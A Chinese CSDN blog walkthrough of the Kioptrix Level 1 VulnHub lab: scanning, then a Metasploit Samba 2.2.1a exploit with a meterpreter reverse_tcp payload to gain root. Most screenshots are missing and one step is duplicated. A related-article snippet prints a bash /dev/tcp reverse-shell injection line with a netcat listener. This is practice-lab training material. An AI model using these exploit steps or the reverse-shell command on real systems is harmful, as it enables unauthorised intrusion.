Kioptrix Level 1靶机通关

最新推荐文章于 2024-07-16 11:06:34 发布
最新推荐文章于 2024-07-16 11:06:34 发布
阅读量421 收藏 10
点赞数 7
文章标签: 网络安全 web安全 系统安全 安全 安全架构
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nanncy_ma/article/details/135059380
版权

Kioptrix: Level 1 (#1)靶机通关

下载地址

#Kioptrix: Level 1 (#1)

https://download.vulnhub.com/kioptrix/Kioptrix_Level_1.rar

Kioptrix: Level 1 (#1): https://www.vulnhub.com/entry/kioptrix-level-1-1,22/

扫描不到IP的解决办法:

1.关闭虚拟机主机

2.移除虚拟机主机,注意并不是从磁盘删除!

3.下载完靶机后,先把.vmx 文件里删除所有以 ethernet0 开头的条目并保存更改

如果你的vmware是16版本的,记得改VirtualHW.version=“16”

img外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传编辑

4.重新导入虚拟机,并重新添加网络适配器,修改其模式为NAT

img外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传编辑

5.确定保存,修改完成

实操如下:

一,扫IP

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

二,扫端口

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

三,扫目录

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

访问这些目录

http://192.168.137.134/index.html

这个是APACHE的默认首页

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

http://192.168.137.134/usage/

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

http://192.168.137.134/manual/

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

四,漏洞扫描

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

开放了samba服务,先从这里入手看下

五,漏洞扫描+漏洞利用

进入msfconsole

1.查找samba辅助模块扫描

search samba auxiliary

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

2.运行auxiliary/scanner/smb/smb_version模块

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

3.用msf查看一下samba的版本*

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

**4.samba版本信息:Samba 2.2.1a

利用searchsploit Samba 2.2.1a 查看相关版本的samba是否存在漏洞。运气很好,有几个。我们使用msf试一下第一个。**

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

5.由上图 No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp,可知默认的payload是 linux/x86/meterpreter/reverse_tcp 加载rhost就可以了

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

6.提权成功

86/meterpreter/reverse_tcp 加载rhost就可以了

[外链图片转存中…(img-iWu3wpkU-1702871600130)]

6.提权成功

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

nanncy_ma
关注
  • 7
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Kioptrix Level 1靶机检测不到IP地址 (determine ip info for eth0 failed)
Viv233的博客
01-29 2178
这里写自定义目录标题背景介绍失败的尝试我是怎么开窍了呢 背景介绍 我是一枚纯小白,艰难的自学OSCP中。。。今天跟着INE的视频启动 Kioptrix Level 1靶机后 发现用netdiscover 和nmap都扫不出靶机IP。 失败的尝试 开始搜怎么回事这是,找到了这样两篇类似帖子: https://blog.csdn.net/qq_41918771/article/details/1036...
Kioptrix: Level 1.1 (#2) -VulnHub靶机学习记录
weixin_45509443的博客
06-19 462
环境:靶机:192.168.1.107 kali:192.168.106 主机发现 端口扫描 浏览器登录80端口,发现登录页面,尝试sql注入绕过密码登录 成功进入,经典ping命令,存在命令执行 kali 开启监听,nc -lvp 6666, 靶机执行命令:127.0.0.1&bash -i >& /dev/tcp/192.168.1.106/6666 0>&1,反弹shell到kali攻击机 成功反弹但不是root权限,开始...
Vulnhub-靶机-Kioptrix: Level 1 (#1)
qq_43264813的博客
01-28 565
Vulnhub—靶机Kioptrix: Level 1 (#1) 本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关 地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ 文章目录Vulnhub—靶机Kioptrix: Level 1 (#1)一、信息收集二、漏洞利用三、Flag 一、信息收集 【步骤一】使用nmap确定目标靶机地址: 【命令】nmap -sP 192.168.4
oscp——Kioptrix: Level 1 (#1)
王嘟嘟的博客
01-31 1107
0x00 前言 这个是第十七台机子了,网上说这个机子是非常简单的,所以来试验一下 链接 https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ 0x01 信息收集 1.IP 2.端口 0x02 攻击 1.端口 这里可以看到80端口开放了OpenSSL 使用nikto进行扫描(我记得oscp考试貌似不让使用工具) nikto -host 192....
Kioptrix: Level 1 (#1)漏洞方法
Abc_Kimball的博客
11-07 593
Kioptrix: Level 1 (#1) 官方网址 https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ 攻击机kali linux 方法一: ifcoonfig查看本地ip地址 查看网段地址信息,发现192.168.43.64为靶机 nmap 192.168.43.64 -O -sS -sV -v查看开启的端口及服务信息 dirb http://192.168.43.64 查看目标有哪些路径,这里未发现可利用信息 nikto -h
Vulnhub靶机Kioptrix_Level1
qq_48904485的博客
03-12 874
运行环境:Virtualbox攻击机:kali(192.168.56.101)靶机Kioptrix_Level1(192.168.56.105)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
kioptrix_level_1 新手入门级通关攻略
qq_58683895的博客
09-16 650
适用于零基础新人的通关攻略,其中包含涉及到知识点
KIOPTRIX: LEVEL 2通关详解
arcuied
04-02 204
KIOPTRIX: LEVEL 2通关详解
KIOPTRIX: LEVEL 1 通关详解
arcuied
03-28 624
KIOPTRIX: LEVEL 1 通关详解
Kioptrix2-WalkThrough 靶机复现.docx
10-18
1. 信息收集:使用 nmap 工具对靶机进行 IP 探活和端口扫描。 2. SQL 注入:使用万能密码尝试登录到靶机上。 3. 命令执行:使用;pwd 命令来确定当前目录,并执行系统命令。 4. 反弹 shell:使用 nc 命令将 shell ...
DC1 靶机复现详细流程
10-02
DC1 靶机复现详细流程
靶机-DC1通关详细过程
06-27
靶机-DC1通关详细过程
Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)
01-09
这次的靶机是Vulnhub靶机Kioptrix: Level 1.2 (#3) 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ ...
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8335
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
DNSSec:网络安全的守护者
jiamisoft的博客
07-12 400
DNSSec是一种安全协议,它为DNS查询和响应过程提供了额外的加密层。通过使用公钥基础设施(PKI)和数字签名,DNSSec能够验证DNS响应的真实性,从而防止DNS欺骗攻击,即攻击者将用户重定向到恶意网站的行为。
在日常生活中,应该如何保护自己的网络安全
最新发布
2301_79527080的博客
07-16 40
安全的网上购物:• 确保购物网站是安全的,检查网址前缀是否为“https”。• 教育和意识:• 不断学习网络安全知识,了解最新的威胁和防御措施。• 确认网站的URL是否正确,避免访问伪造的网站。• 启用多因素认证(MFA):• 多因素认证可以为账户提供额外的安全层,通常包括你所知道的(密码)、你所拥有的(手机验证码)以及你是谁(生物特征识别)。• 限制公开信息:• 避免在社交媒体上公开过多的个人信息,如旅行计划、工作地点等。• 更新和补丁:• 保持操作系统、软件和应用程序的最新状态,及时安装安全补丁。
网络安全-基础网络概念1
LS_Ai的博客
07-11 552
计算机网络是一种将多个计算机系统和设备连接在一起的技术,目的是为了共享资源和信息。网络使得设备之间可以进行数据传输和通信,常见的网络包括局域网(LAN)、广域网(WAN)和城域网(MAN)。
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值